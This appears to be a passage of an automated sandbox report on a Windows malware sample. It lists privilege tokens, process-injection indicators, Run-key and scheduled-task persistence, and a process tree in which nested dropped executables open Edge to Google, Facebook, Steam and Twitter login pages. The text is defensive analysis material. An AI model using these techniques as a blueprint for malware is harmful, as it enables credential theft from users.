Token: SeTakeOwnershipPrivilege	4504	powershell.exe
Token: SeLoadDriverPrivilege	4504	powershell.exe
Token: SeSystemProfilePrivilege	4504	powershell.exe
Token: SeSystemtimePrivilege	4504	powershell.exe
Token: SeProfSingleProcessPrivilege	4504	powershell.exe
Token: SeIncBasePriorityPrivilege	4504	powershell.exe
Token: SeCreatePagefilePrivilege	4504	powershell.exe
Token: SeBackupPrivilege	4504	powershell.exe
Token: SeRestorePrivilege	4504	powershell.exe
Token: SeShutdownPrivilege	4504	powershell.exe
Token: SeDebugPrivilege	4504	powershell.exe
Token: SeSystemEnvironmentPrivilege	4504	powershell.exe
Token: SeRemoteShutdownPrivilege	4504	powershell.exe
Token: SeUndockPrivilege	4504	powershell.exe
Token: SeManageVolumePrivilege	4504	powershell.exe
Token: 33	4504	powershell.exe
Token: 34	4504	powershell.exe
Token: 35	4504	powershell.exe
Token: 36	4504	powershell.exe
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE

Suspicious use of FindShellTrayWindow 58 IoCs

pid	Process
3532	1Vt03Av8.exe
3532	1Vt03Av8.exe
3532	1Vt03Av8.exe
3532	1Vt03Av8.exe
3532	1Vt03Av8.exe
3532	1Vt03Av8.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
3532	1Vt03Av8.exe
3532	1Vt03Av8.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe

Suspicious use of SendNotifyMessage 56 IoCs

pid	Process
3532	1Vt03Av8.exe
3532	1Vt03Av8.exe
3532	1Vt03Av8.exe
3532	1Vt03Av8.exe
3532	1Vt03Av8.exe
3532	1Vt03Av8.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
3532	1Vt03Av8.exe
3532	1Vt03Av8.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4636	Broom.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3292	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1616 wrote to memory of 2548	1616	57c0272d464fe604ca3b900d91e98b925f3745fcdc51858b01ee59a8eaa79166.exe	87
PID 1616 wrote to memory of 2548	1616	57c0272d464fe604ca3b900d91e98b925f3745fcdc51858b01ee59a8eaa79166.exe	87
PID 1616 wrote to memory of 2548	1616	57c0272d464fe604ca3b900d91e98b925f3745fcdc51858b01ee59a8eaa79166.exe	87
PID 2548 wrote to memory of 4548	2548	vi3kz20.exe	88
PID 2548 wrote to memory of 4548	2548	vi3kz20.exe	88
PID 2548 wrote to memory of 4548	2548	vi3kz20.exe	88
PID 4548 wrote to memory of 4608	4548	jH7gp62.exe	90
PID 4548 wrote to memory of 4608	4548	jH7gp62.exe	90
PID 4548 wrote to memory of 4608	4548	jH7gp62.exe	90
PID 4608 wrote to memory of 3532	4608	BE8Ik00.exe	91
PID 4608 wrote to memory of 3532	4608	BE8Ik00.exe	91
PID 4608 wrote to memory of 3532	4608	BE8Ik00.exe	91
PID 3532 wrote to memory of 4212	3532	1Vt03Av8.exe	93
PID 3532 wrote to memory of 4212	3532	1Vt03Av8.exe	93
PID 3532 wrote to memory of 3228	3532	1Vt03Av8.exe	96
PID 3532 wrote to memory of 3228	3532	1Vt03Av8.exe	96
PID 3228 wrote to memory of 1404	3228	msedge.exe	98
PID 3228 wrote to memory of 1404	3228	msedge.exe	98
PID 4212 wrote to memory of 4620	4212	msedge.exe	97
PID 4212 wrote to memory of 4620	4212	msedge.exe	97
PID 3532 wrote to memory of 3464	3532	1Vt03Av8.exe	100
PID 3532 wrote to memory of 3464	3532	1Vt03Av8.exe	100
PID 3464 wrote to memory of 5112	3464	msedge.exe	99
PID 3464 wrote to memory of 5112	3464	msedge.exe	99
PID 3532 wrote to memory of 4220	3532	1Vt03Av8.exe	101
PID 3532 wrote to memory of 4220	3532	1Vt03Av8.exe	101
PID 4220 wrote to memory of 2368	4220	msedge.exe	103
PID 4220 wrote to memory of 2368	4220	msedge.exe	103
PID 3532 wrote to memory of 1968	3532	1Vt03Av8.exe	102
PID 3532 wrote to memory of 1968	3532	1Vt03Av8.exe	102
PID 1968 wrote to memory of 2204	1968	msedge.exe	104
PID 1968 wrote to memory of 2204	1968	msedge.exe	104
PID 3532 wrote to memory of 4888	3532	1Vt03Av8.exe	105
PID 3532 wrote to memory of 4888	3532	1Vt03Av8.exe	105
PID 4888 wrote to memory of 3572	4888	msedge.exe	106
PID 4888 wrote to memory of 3572	4888	msedge.exe	106
PID 3532 wrote to memory of 2252	3532	1Vt03Av8.exe	107
PID 3532 wrote to memory of 2252	3532	1Vt03Av8.exe	107
PID 2252 wrote to memory of 2240	2252	msedge.exe	108
PID 2252 wrote to memory of 2240	2252	msedge.exe	108
PID 3532 wrote to memory of 4456	3532	1Vt03Av8.exe	109
PID 3532 wrote to memory of 4456	3532	1Vt03Av8.exe	109
PID 4456 wrote to memory of 4552	4456	msedge.exe	110
PID 4456 wrote to memory of 4552	4456	msedge.exe	110
PID 3532 wrote to memory of 3660	3532	1Vt03Av8.exe	111
PID 3532 wrote to memory of 3660	3532	1Vt03Av8.exe	111
PID 3660 wrote to memory of 3328	3660	msedge.exe	117
PID 3660 wrote to memory of 3328	3660	msedge.exe	117
PID 4212 wrote to memory of 5204	4212	msedge.exe	116
PID 4212 wrote to memory of 5204	4212	msedge.exe	116
PID 4212 wrote to memory of 5204	4212	msedge.exe	116
PID 4212 wrote to memory of 5204	4212	msedge.exe	116
PID 4212 wrote to memory of 5204	4212	msedge.exe	116
PID 4212 wrote to memory of 5204	4212	msedge.exe	116
PID 4212 wrote to memory of 5204	4212	msedge.exe	116
PID 4212 wrote to memory of 5204	4212	msedge.exe	116
PID 4212 wrote to memory of 5204	4212	msedge.exe	116
PID 4212 wrote to memory of 5204	4212	msedge.exe	116
PID 4212 wrote to memory of 5204	4212	msedge.exe	116
PID 4212 wrote to memory of 5204	4212	msedge.exe	116
PID 4212 wrote to memory of 5204	4212	msedge.exe	116
PID 4212 wrote to memory of 5204	4212	msedge.exe	116
PID 4212 wrote to memory of 5204	4212	msedge.exe	116
PID 4212 wrote to memory of 5204	4212	msedge.exe	116

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3292
- C:\Users\Admin\AppData\Local\Temp\57c0272d464fe604ca3b900d91e98b925f3745fcdc51858b01ee59a8eaa79166.exe
  "C:\Users\Admin\AppData\Local\Temp\57c0272d464fe604ca3b900d91e98b925f3745fcdc51858b01ee59a8eaa79166.exe"
  2⤵
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:1616
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vi3kz20.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vi3kz20.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:2548
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\jH7gp62.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\jH7gp62.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:4548
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\BE8Ik00.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\BE8Ik00.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:4608
      - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Vt03Av8.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Vt03Av8.exe
        6⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:3532
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
        7⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:4212
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffa20ac46f8,0x7ffa20ac4708,0x7ffa20ac4718
        8⤵
        
        PID:4620
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5340
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
        8⤵
        
        PID:5204
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
        8⤵
        
        PID:5740
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
        8⤵
        
        PID:5732
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2948 /prefetch:8
        8⤵
        
        PID:5480
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:1
        8⤵
        
        PID:6364
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2364 /prefetch:1
        8⤵
        
        PID:6976
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4664 /prefetch:1
        8⤵
        
        PID:5792
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3684 /prefetch:1
        8⤵
        
        PID:5968
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4924 /prefetch:1
        8⤵
        
        PID:6932
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3708 /prefetch:1
        8⤵
        
        PID:2628
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:1
        8⤵
        
        PID:6108
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
        8⤵
        
        PID:5940
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:1
        8⤵
        
        PID:5876
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:1
        8⤵
        
        PID:6628
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6752 /prefetch:1
        8⤵
        
        PID:5620
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6884 /prefetch:1
        8⤵
        
        PID:3516
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7972 /prefetch:1
        8⤵
        
        PID:5196
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6428 /prefetch:1
        8⤵
        
        PID:996
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9648 /prefetch:8
        8⤵
        
        PID:6728
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9648 /prefetch:8
        8⤵
        
        PID:6288
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9688 /prefetch:1
        8⤵
        
        PID:5164
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9732 /prefetch:1
        8⤵
        
        PID:5212
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7540 /prefetch:1
        8⤵
        
        PID:4924
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,8220737051920408480,6091679559240062529,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9724 /prefetch:1
        8⤵
        
        PID:1580
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3228
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffa20ac46f8,0x7ffa20ac4708,0x7ffa20ac4718
        8⤵
        
        PID:1404
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,17665678581267767688,7122869992620943999,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5512
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,17665678581267767688,7122869992620943999,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
        8⤵
        
        PID:5504
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3464
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,2290146048663342429,17047933081077476977,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5760
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,2290146048663342429,17047933081077476977,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
        8⤵
        
        PID:5748
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:4220
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffa20ac46f8,0x7ffa20ac4708,0x7ffa20ac4718
        8⤵
        
        PID:2368
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,13126446502180322246,17451893045840989949,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5612
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,13126446502180322246,17451893045840989949,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
        8⤵
        
        PID:5604
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
        7⤵
